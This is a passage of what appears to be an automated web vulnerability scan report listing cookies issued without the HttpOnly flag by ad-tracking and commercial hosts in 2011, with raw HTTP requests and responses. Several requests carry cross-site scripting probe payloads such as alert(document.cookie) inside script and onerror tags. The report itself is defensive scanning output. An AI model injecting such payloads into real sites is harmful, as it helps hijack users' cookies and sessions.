Set-Cookie: pluto=613465378701; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT


14.312. http://media.fastclick.net/w/win.bid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/win.bid

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
  • vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
  • adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
  • pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:37:24 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 883
Set-Cookie: pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
Set-Cookie: adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT

<a href="http://media.fastclick.net/w/click.here?cid=256698&mid=477674&m=1&sid=54816&c=0&tp=5&exid=3&asite=2061501907&vtid=14839&walsh=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBhN
...[SNIP]...

14.313. http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.autobytel.com
Path:   /b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; Expires=Sat, 23 Jan 2016 21:06:45 GMT; Domain=.autobytel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011?[AQB]&ndh=1&t=24/0/2011%2015%3A7%3A27%201%20360&pageName=unknown&g=http%3A//www.autobytel.com/x22&r=http%3A//burp/show/31&cc=USD&server=CWEB425&events=event10&products=%3B%3B%3B%3Bevent10%3D0&c1=Search%20Engine%20Optimization%20Project&v1=Search%20Engine%20Optimization%20Project&c2=SEO%20DTS%20-%20Google%20ABTL%2013148&v2=SEO%20DTS%20-%20Google%20ABTL%2013148&v3=NT-&v6=Search%20Engine%20Optimization%20Project%20%3A%20unknown&c10=%7C&c11=Search%20Engine%20Optimization%20Project%7C13148%7CABTL&c12=%7C%7C&c14=unknown%20%3A%20Search%20Engine%20Optimization%20Project%20entry%20page&c15=%7CNo%20Article&c20=%7C%7C%7C%7C%7C%7CSearch%20Engine%20Optimization%20Project&c21=Autobytel.com&c32=ads%20-%200&c34=Google%20Search%7Ef34b4--%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document.cookie%29%3Ef067754e5c4&c40=427D360F-AD19-8945-2CEDA65620083A33&c42=UpperFunnel&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.autobytel.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:06:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; Expires=Sat, 23 Jan 2016 21:06:45 GMT; Domain=.autobytel.com; Path=/
Location: http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011?AQB=1&pccr=true&vidn=269EF4F28501182F-60000108600B027D&&ndh=1&t=24/0/2011%2015%3A7%3A27%201%20360&pageName=unknown&g=http%3A//www.autobytel.com/x22&r=http%3A//burp/show/31&cc=USD&server=CWEB425&events=event10&products=%3B%3B%3B%3Bevent10%3D0&c1=Search%20Engine%20Optimization%20Project&v1=Search%20Engine%20Optimization%20Project&c2=SEO%20DTS%20-%20Google%20ABTL%2013148&v2=SEO%20DTS%20-%20Google%20ABTL%2013148&v3=NT-&v6=Search%20Engine%20Optimization%20Project%20%3A%20unknown&c10=%7C&c11=Search%20Engine%20Optimization%20Project%7C13148%7CABTL&c12=%7C%7C&c14=unknown%20%3A%20Search%20Engine%20Optimization%20Project%20entry%20page&c15=%7CNo%20Article&c20=%7C%7C%7C%7C%7C%7CSearch%20Engine%20Optimization%20Project&c21=Autobytel.com&c32=ads%20-%200&c34=Google%20Search%7Ef34b4--%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document.cookie%29%3Ef067754e5c4&c40=427D360F-AD19-8945-2CEDA65620083A33&c42=UpperFunnel&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 23 Jan 2011 21:06:45 GMT
Last-Modified: Tue, 25 Jan 2011 21:06:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www67
Content-Length: 0
Content-Type: text/plain


14.314. http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.traderonline.com
Path:   /b/ss/detraderonline/1/H.17/s93964351669419

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; Expires=Sat, 23 Jan 2016 15:58:35 GMT; Domain=.traderonline.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/detraderonline/1/H.17/s93964351669419?AQB=1&ndh=1&t=24/0/2011%209%3A59%3A11%201%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.traderonline.com/x22ec89d%253Cscript%253Ealert%28document.cookie%29%253C/script%253E93a08fbf703&r=http%3A//burp/show/5&cc=USD&pageType=errorPage&events=event1&c1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&v1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&c4=Data%20Not%20Available&v4=Data%20Not%20Available&c7=New&v7=New&c8=First%20Visit&v8=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=950&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B; s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 15:58:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; Expires=Sat, 23 Jan 2016 15:58:35 GMT; Domain=.traderonline.com; Path=/
Location: http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419?AQB=1&pccr=true&vidn=269ED0D58501209E-6000010F000341E3&&ndh=1&t=24/0/2011%209%3A59%3A11%201%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.traderonline.com/x22ec89d%253Cscript%253Ealert%28document.cookie%29%253C/script%253E93a08fbf703&r=http%3A//burp/show/5&cc=USD&pageType=errorPage&events=event1&c1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&v1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&c4=Data%20Not%20Available&v4=Data%20Not%20Available&c7=New&v7=New&c8=First%20Visit&v8=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=950&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 23 Jan 2011 15:58:35 GMT
Last-Modified: Tue, 25 Jan 2011 15:58:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www120
Content-Length: 0
Content-Type: text/plain


14.315. http://mig.nexac.com/2/B3DM/DLX/1@x96

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
  • NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2/B3DM/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1391
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

if((cookie_check(
...[SNIP]...

14.316. http://my.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 9eaf6601670c0ef4fb11c453b34b19f8=ad1bd55b950dc34700e6681bcc93141e; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9eaf6601670c0ef4fb11c453b34b19f8=ad1bd55b950dc34700e6681bcc93141e; path=/
Last-Modified: Mon, 24 Jan 2011 22:43:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...

14.317. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • RMFL=011PhXoxU10EfJ|U10Eo1|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
  • NXCLICK2=011PhXoxNX_TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure!y!B3!166E!1MSss; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
  • NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Tue, 25-Jan-2011 01:36:47 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; RMFL=011PcqlQU10EfJ|U10Eo1; NXCLICK2=011PcqlaNX_TRACK_Nutrisystem/Retarget_Landingpage_Nonsecure!y!B3!EfJ!pUFr

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFL=011PhXoxU10EfJ|U10Eo1|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Set-Cookie: NXCLICK2=011PhXoxNX_TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure!y!B3!166E!1MSss; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/USNetwork/BCN2010110276_000_RadioShack/1x1trans.gif
Content-Length: 380
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Tue, 25-Jan-2011 01:36:47 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

14.318. http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.webshots.com
Path:   /photo/1059414821042998563QWNlxQ/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • AB_ID=5829807500397041135; domain=.webshots.com; path=/; expires=Sun, 19-Jan-2031 22:44:08 GMT
  • NSC_ed3-xt-bqq-cbdlfoe-mc=e24d345029a0;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photo/1059414821042998563QWNlxQ/x22 HTTP/1.1
Host: news.webshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 22:43:59 GMT
Server: Resin/3.0.23
Location: http://community.webshots.com/oldphoto.html
Set-Cookie: AB_ID=5829807500397041135; domain=.webshots.com; path=/; expires=Sun, 19-Jan-2031 22:44:08 GMT
Set-Cookie: session_source=webs; domain=.webshots.com; path=/
Content-Length: 0
Set-Cookie: NSC_ed3-xt-bqq-cbdlfoe-mc=e24d345029a0;path=/
Vary: Accept-Encoding
Content-Type: text/plain


14.319. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 6257
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033
...[SNIP]...

14.320. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4864
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1961884465/Middle
...[SNIP]...

14.321. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4265
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1371072572/Middle
...[SNIP]...

14.322. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4330
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1769617372/Middle
...[SNIP]...

